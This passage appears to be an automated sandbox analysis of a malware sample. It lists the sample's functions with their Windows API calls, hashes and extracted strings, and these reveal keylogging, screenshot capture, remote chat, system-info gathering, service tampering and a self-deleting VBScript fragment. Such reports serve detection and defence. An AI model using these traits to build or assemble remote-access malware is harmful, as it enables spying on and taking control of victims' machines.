                                          • Opcode Fuzzy Hash: bb9b9e046f18df13769a8b787e7ac1b47d7a5fbf9c12ca0a2a4058909c6e6bd6
                                          • Instruction Fuzzy Hash: F5C16B31A00219ABCB14FBA5DD829EEB7B5AF44304F10817FF406B62D1EF385A449F99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: _free$Info
                                          • String ID:
                                          • API String ID: 2509303402-0
                                          • Opcode ID: 7694ea18338fa1bfac6c26abc79962f6d292df763f94c390f2a259a7191eca11
                                          • Instruction ID: 1e5099d4cf7091294613e4cd6a63c328f2291409cd47a3a75e98f44bfb697c1d
                                          • Opcode Fuzzy Hash: 7694ea18338fa1bfac6c26abc79962f6d292df763f94c390f2a259a7191eca11
                                          • Instruction Fuzzy Hash: FEB18E71D002059FEB15AFB9C881BEEBBB4BF08304F14407EE955A7352DB7998498B68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 0044958A
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 0044879F
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 004487B1
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 004487C3
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 004487D5
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 004487E7
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 004487F9
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 0044880B
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 0044881D
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 0044882F
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 00448841
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 00448853
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 00448865
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 00448877
                                          • _free.LIBCMT ref: 0044957F
                                            • Part of subcall function 004401F5: RtlFreeHeap.NTDLL(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
                                            • Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D
                                          • _free.LIBCMT ref: 004495A1
                                          • _free.LIBCMT ref: 004495B6
                                          • _free.LIBCMT ref: 004495C1
                                          • _free.LIBCMT ref: 004495E3
                                          • _free.LIBCMT ref: 004495F6
                                          • _free.LIBCMT ref: 00449604
                                          • _free.LIBCMT ref: 0044960F
                                          • _free.LIBCMT ref: 00449647
                                          • _free.LIBCMT ref: 0044964E
                                          • _free.LIBCMT ref: 0044966B
                                          • _free.LIBCMT ref: 00449683
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: a7a44145eda274c6b868085031fcefb37300b09f98cd336fdb7b7f61136a4ce2
                                          • Instruction ID: bc7df33f33a806a4e6538402b94214bd38d1e854ce5dbc401830de06ad29eac0
                                          • Opcode Fuzzy Hash: a7a44145eda274c6b868085031fcefb37300b09f98cd336fdb7b7f61136a4ce2
                                          • Instruction Fuzzy Hash: 46316B32600601AFFB21AA3AD845B5B73E8AF01354F21441FE659D7251DF3AAD509B2C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: ff559e5e999e58a004be9679cc9065634e2accb6f8594f74057a9405fe1c658f
                                          • Instruction ID: 0fd459aec3f5e05b68cc896b93c3b77f39616f80babc804ed9fa449a4b9e12b5
                                          • Opcode Fuzzy Hash: ff559e5e999e58a004be9679cc9065634e2accb6f8594f74057a9405fe1c658f
                                          • Instruction Fuzzy Hash: 0EC10571E40204AFEB20DBA9CC42FEF77F8EB49705F14415AFB05EB282D6B499419798
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0044EF23: CreateFileW.KERNEL32(00000000,00000000,?,0044F2FE,?,?,00000000,?,0044F2FE,00000000,0000000C), ref: 0044EF40
                                          • GetLastError.KERNEL32 ref: 0044F369
                                          • __dosmaperr.LIBCMT ref: 0044F370
                                          • GetFileType.KERNEL32(00000000), ref: 0044F37C
                                          • GetLastError.KERNEL32 ref: 0044F386
                                          • __dosmaperr.LIBCMT ref: 0044F38F
                                          • CloseHandle.KERNEL32(00000000), ref: 0044F3AF
                                          • CloseHandle.KERNEL32(?), ref: 0044F4F9
                                          • GetLastError.KERNEL32 ref: 0044F52B
                                          • __dosmaperr.LIBCMT ref: 0044F532
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID: H
                                          • API String ID: 4237864984-2852464175
                                          • Opcode ID: 47bb2141c220456fdb7a8c8012237244b82838329f6a58beebc578ef5c24065f
                                          • Instruction ID: 8387d8c7474957efea47537ed2c3f831a95fafc38b1db0bb8119202e772c3410
                                          • Opcode Fuzzy Hash: 47bb2141c220456fdb7a8c8012237244b82838329f6a58beebc578ef5c24065f
                                          • Instruction Fuzzy Hash: 18A15A32A105489FEF19DF68D8417AE7BA0EB06324F14016EF801DB392DB799D16CB5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 004091F7
                                          • Sleep.KERNEL32(000001F4), ref: 00409202
                                          • GetForegroundWindow.USER32 ref: 00409208
                                          • GetWindowTextLengthW.USER32(00000000), ref: 00409211
                                          • GetWindowTextW.USER32 ref: 00409245
                                          • Sleep.KERNEL32(000003E8), ref: 00409313
                                            • Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79
                                            • Part of subcall function 00408B80: SetEvent.KERNEL32(?,?,?,?,00409CFC,?,?,?,?,?,00000000), ref: 00408BAD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
                                          • String ID: [ ${ User has been idle for $ ]$ minutes }
                                          • API String ID: 107669343-3343415809
                                          • Opcode ID: 5208e0e58cc42efc71676e40296c05a26964b477c59cb947b62b6e083ccbcc4a
                                          • Instruction ID: 503b2ce70374cf4332f5393007fb2740c98398301deed75f23da1ef1a57f7c11
                                          • Opcode Fuzzy Hash: 5208e0e58cc42efc71676e40296c05a26964b477c59cb947b62b6e083ccbcc4a
                                          • Instruction Fuzzy Hash: A251D3716082415BC314FB25D846A6E77A5AF84348F44093FF842A62E3EF7C9E45C69E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
                                            • Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E
                                            • Part of subcall function 00410A30: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
                                            • Part of subcall function 00410A30: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
                                            • Part of subcall function 00410A30: RegCloseKey.KERNELBASE(00000000), ref: 00410A70
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B4E2
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B641
                                          • ExitProcess.KERNEL32 ref: 0040B64D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                          • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                          • API String ID: 1913171305-2411266221
                                          • Opcode ID: 471263eda05c6b116b6e8d9e67640a1fadfb8c4d9037e08d957ddcf25ab83b01
                                          • Instruction ID: 1eb9c9899973781d748da32130d6708d7247d8467cae5aa57bbac03f0cab9b6b
                                          • Opcode Fuzzy Hash: 471263eda05c6b116b6e8d9e67640a1fadfb8c4d9037e08d957ddcf25ab83b01
                                          • Instruction Fuzzy Hash: C74150319101185ACB14FB61DC92DEE7779AF60748F10007FF806721E2EF385E4ACA99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004355E2
                                          • GetLastError.KERNEL32(?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004355EF
                                          • __dosmaperr.LIBCMT ref: 004355F6
                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00435622
                                          • GetLastError.KERNEL32(?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043562C
                                          • __dosmaperr.LIBCMT ref: 00435633
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D39,?), ref: 00435676
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00435680
                                          • __dosmaperr.LIBCMT ref: 00435687
                                          • _free.LIBCMT ref: 00435693
                                          • _free.LIBCMT ref: 0043569A
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                          • String ID:
                                          • API String ID: 2441525078-0
                                          • Opcode ID: 3975231651934d3df67afdbb7a717a2001fd2b5ecf708002a1789c5af24e8e78
                                          • Instruction ID: b5d46763a30f5c02a0768ec9d988a2018c1f619f389f5c820b1df77af5e22da9
                                          • Opcode Fuzzy Hash: 3975231651934d3df67afdbb7a717a2001fd2b5ecf708002a1789c5af24e8e78
                                          • Instruction Fuzzy Hash: 9F314A71400A0ABFDF01AFA5CC46DAF7B78EF08365F10416AF91896291DB39CD21CB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetEvent.KERNEL32(?,?), ref: 0040540C
                                          • GetMessageA.USER32 ref: 004054BC
                                          • TranslateMessage.USER32(?), ref: 004054CB
                                          • DispatchMessageA.USER32 ref: 004054D6
                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,0046C2B8), ref: 0040558E
                                          • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 004055C6
                                            • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                          • API String ID: 2956720200-749203953
                                          • Opcode ID: b8f8230bb179b2956526afa6d6b0b095e4ee809aa88c6e3b7f6ce2c6c49b1e73
                                          • Instruction ID: 33c0be49a712d0e34ef4d1a509f5b181f9b779c8c834d9e011c7c8049845a3e0
                                          • Opcode Fuzzy Hash: b8f8230bb179b2956526afa6d6b0b095e4ee809aa88c6e3b7f6ce2c6c49b1e73
                                          • Instruction Fuzzy Hash: DF41B371604300ABCA14FB76DD4A96F77A99B85704B40093FF911A75E2EF3C8909CB9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,00415E19,00000000), ref: 00416481
                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00415E19,00000000), ref: 00416498
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164A5
                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00415E19,00000000), ref: 004164B4
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164C5
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164C8
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: d59cadb48f7792a6efc1e83c6762a84be932b4ef907882e6865667c411f38059
                                          • Instruction ID: 9fe600a8707d0c96f8df9479574b059baa9e236c1ba3853f5d66e3923bac8ba5
                                          • Opcode Fuzzy Hash: d59cadb48f7792a6efc1e83c6762a84be932b4ef907882e6865667c411f38059
                                          • Instruction Fuzzy Hash: 381182319403187BD721AF64DC89DFF3B7CDB45BA3700013AF90592192DB68DE46AAA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0041593D
                                          • GdiplusStartup.GDIPLUS(0046BEA0,?,00000000), ref: 0041596F
                                            • Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F
                                            • Part of subcall function 0041576E: SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 004157C7
                                            • Part of subcall function 0041576E: DeleteFileW.KERNEL32(00000000,0000001B), ref: 00415858
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004159FB
                                          • Sleep.KERNEL32(000003E8), ref: 00415A81
                                          • GetLocalTime.KERNEL32(?), ref: 00415A89
                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00415B78
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateSleep$DeleteDirectoryFileGdiplusH_prologLocalStartupStreamTimechar_traits
                                          • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                          • API String ID: 3280235481-3790400642
                                          • Opcode ID: dfda3036b7f4fdd4fe27100e21df2067ca75359026321bd74113c003ce21abe3
                                          • Instruction ID: a88af923db25c08f263845cfd4b3868e06691e543411564c9f1a5e85300975ae
                                          • Opcode Fuzzy Hash: dfda3036b7f4fdd4fe27100e21df2067ca75359026321bd74113c003ce21abe3
                                          • Instruction Fuzzy Hash: 89517F70A002589ACB14BBB6CC529FE77699F54308F00003FF845AB1E2EF3C5E8587A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79
                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004136D4
                                            • Part of subcall function 004179DC: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9
                                          • Sleep.KERNEL32(00000064), ref: 00413700
                                          • DeleteFileW.KERNEL32(00000000), ref: 00413734
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: File$CreateDeleteExecuteShellSleepchar_traits
                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                          • API String ID: 2701014334-2001430897
                                          • Opcode ID: 4ae9a0042fd3d898069abe8b57f97cd73655c9fb085f26b413844e457ee4bb3e
                                          • Instruction ID: f4a0078ff742d4c0d57fd8ead3e50225e02e9f8c908c9e0bc41a8f95a638bb01
                                          • Opcode Fuzzy Hash: 4ae9a0042fd3d898069abe8b57f97cd73655c9fb085f26b413844e457ee4bb3e
                                          • Instruction Fuzzy Hash: 15316F719102095BCB14FBA5DC92AEE7735AF50308F40007FF905771D2EF785E498A99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F
                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,[Info],00000000,0046C238,?,00406EAD,00000000), ref: 00406331
                                          • WriteFile.KERNEL32(?,?,00000000,00406EAD,00000000,?,000186A0,00406EAD,?,00406EAD,00000000,?,?,0000000A,00000000), ref: 00406379
                                          • CloseHandle.KERNEL32(00000000,?,00406EAD,00000000,?,?,0000000A,00000000), ref: 004063B3
                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 004063CB
                                          • CloseHandle.KERNEL32(?,00000057,?,00000008,?,?,?,?,?,?,?,?,00000000), ref: 004063EF
                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004063FE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
                                          • String ID: .part$[Info]
                                          • API String ID: 820096542-3571004685
                                          • Opcode ID: ca82bc6b31bcb38aee6bd46f4e6acb32019e3c1c129d2b9990e42a317797f797
                                          • Instruction ID: 68dcce1d93323748b1337c278f552d509b85ae635904d8fd02d733045cb5952f
                                          • Opcode Fuzzy Hash: ca82bc6b31bcb38aee6bd46f4e6acb32019e3c1c129d2b9990e42a317797f797
                                          • Instruction Fuzzy Hash: E3314F71D00219ABCB00EFA5CC959EEB77DEF44345F10857AFD11B3191DA786A44CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 004088AD
                                          • SetWindowsHookExA.USER32 ref: 004088BB
                                          • GetLastError.KERNEL32 ref: 004088C7
                                            • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                                          • GetMessageA.USER32 ref: 00408915
                                          • TranslateMessage.USER32(?), ref: 00408924
                                          • DispatchMessageA.USER32 ref: 0040892F
                                          Strings
                                          • Keylogger initialization failure: error , xrefs: 004088DB
                                          • [ERROR], xrefs: 004088ED
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                          • String ID: Keylogger initialization failure: error $[ERROR]
                                          • API String ID: 3219506041-2451335947
                                          • Opcode ID: 8ea95556890b4c9da9a23e7bccd80e685f265dd08c2c7945773fe28fe98e8065
                                          • Instruction ID: 34009541f3e87155e43b52d28ab51065b23688c1b97c42bbbbbfc9b875d1dcea
                                          • Opcode Fuzzy Hash: 8ea95556890b4c9da9a23e7bccd80e685f265dd08c2c7945773fe28fe98e8065
                                          • Instruction Fuzzy Hash: 5E11BF726002016BC3107FB69D0986B77ECEB91756B10063EF886E2191EF74C504C7AB
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 25a0fedeef60de312601f7e3a4da6be786f1c13d1c85f17154f2cc7462e416b2
                                          • Instruction ID: 967283b79ba0ff2862e9fd1e91011e9ab355d2b8f59743005224cd781b83b7a3
                                          • Opcode Fuzzy Hash: 25a0fedeef60de312601f7e3a4da6be786f1c13d1c85f17154f2cc7462e416b2
                                          • Instruction Fuzzy Hash: 6EC11B70D05249AFEF11EFA8C841BAEBBB4BF1A314F05415AE54097392C7789941CF6B
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0044E981
                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EA04
                                          • __alloca_probe_16.LIBCMT ref: 0044EA3C
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0044EBAE,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EA97
                                          • __alloca_probe_16.LIBCMT ref: 0044EAE6
                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EAAE
                                            • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EB2A
                                          • __freea.LIBCMT ref: 0044EB55
                                          • __freea.LIBCMT ref: 0044EB61
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                          • String ID:
                                          • API String ID: 201697637-0
                                          • Opcode ID: 32218eb1e629b46f8e44902807a92171ca436c95332ad8c55ee50f46f9c4f122
                                          • Instruction ID: 57d3b8f3912e80867dbd5bea15d3c0571bce0196d8e9b81a223875e0514adfa6
                                          • Opcode Fuzzy Hash: 32218eb1e629b46f8e44902807a92171ca436c95332ad8c55ee50f46f9c4f122
                                          • Instruction Fuzzy Hash: 9791C2B1E002569AEF208E66C841AAFBBA5FF09754F14066BE805E7281D739DC418769
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                            • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                            • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                            • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                          • _memcmp.LIBVCRUNTIME ref: 0043EC78
                                          • _free.LIBCMT ref: 0043ECE9
                                          • _free.LIBCMT ref: 0043ED02
                                          • _free.LIBCMT ref: 0043ED34
                                          • _free.LIBCMT ref: 0043ED3D
                                          • _free.LIBCMT ref: 0043ED49
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorLast$_abort_memcmp
                                          • String ID: C
                                          • API String ID: 1679612858-1037565863
                                          • Opcode ID: 277548da258104ed8908660a936750183da96d368650c7950346f8602d7075a1
                                          • Instruction ID: 95dbb2c384f2b4054f08a0819f6185acf069c750c5e84a8d12f5530653077751
                                          • Opcode Fuzzy Hash: 277548da258104ed8908660a936750183da96d368650c7950346f8602d7075a1
                                          • Instruction Fuzzy Hash: 81B12B7590221ADFDB24DF19C884AAEB7B4FF08314F1055AEE94AA7390D735AE90CF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00415D21,00000000), ref: 004165ED
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00415D21,00000000), ref: 00416601
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415D21,00000000), ref: 0041660E
                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00415D21,00000000), ref: 00416643
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415D21,00000000), ref: 00416655
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415D21,00000000), ref: 00416658
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                          • String ID: !]A
                                          • API String ID: 493672254-3355486170
                                          • Opcode ID: 2da83694551842a269e36bbdcf3309e14e33c364ad340a3786a25d643810b493
                                          • Instruction ID: 232e6080decb0fee5e9ead3af30a3f9a58c51749ff75a055db7eec232c54b811
                                          • Opcode Fuzzy Hash: 2da83694551842a269e36bbdcf3309e14e33c364ad340a3786a25d643810b493
                                          • Instruction Fuzzy Hash: 59016D311443253AD6114F3C9C4EEBF3B6CDB417B2F01032BF925922D2DA68CE4295AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00415F36,00000000), ref: 0041651E
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00415F36,00000000), ref: 00416532
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415F36,00000000), ref: 0041653F
                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00415F36,00000000), ref: 0041654E
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415F36,00000000), ref: 00416560
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415F36,00000000), ref: 00416563
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID: 6_A
                                          • API String ID: 221034970-3814682797
                                          • Opcode ID: 2c2b3b8fe19efe00be5a0416e4d3573a756b0db6844cffd145971c513e7c467f
                                          • Instruction ID: da1897a772ed1359c9b05f965c8e3084c4a483461664f911434d7ad5a9b28404
                                          • Opcode Fuzzy Hash: 2c2b3b8fe19efe00be5a0416e4d3573a756b0db6844cffd145971c513e7c467f
                                          • Instruction Fuzzy Hash: 90F0C2715403187BD221AF65EC49DBF3B6CDB45B92F00002AFE0992196DA38CE4596E9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,00428E1A,?,?,?,00444840,00000001,00000001,?), ref: 00444649
                                          • __alloca_probe_16.LIBCMT ref: 00444681
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,00428E1A,?,?,?,00444840,00000001,00000001,?), ref: 004446CF
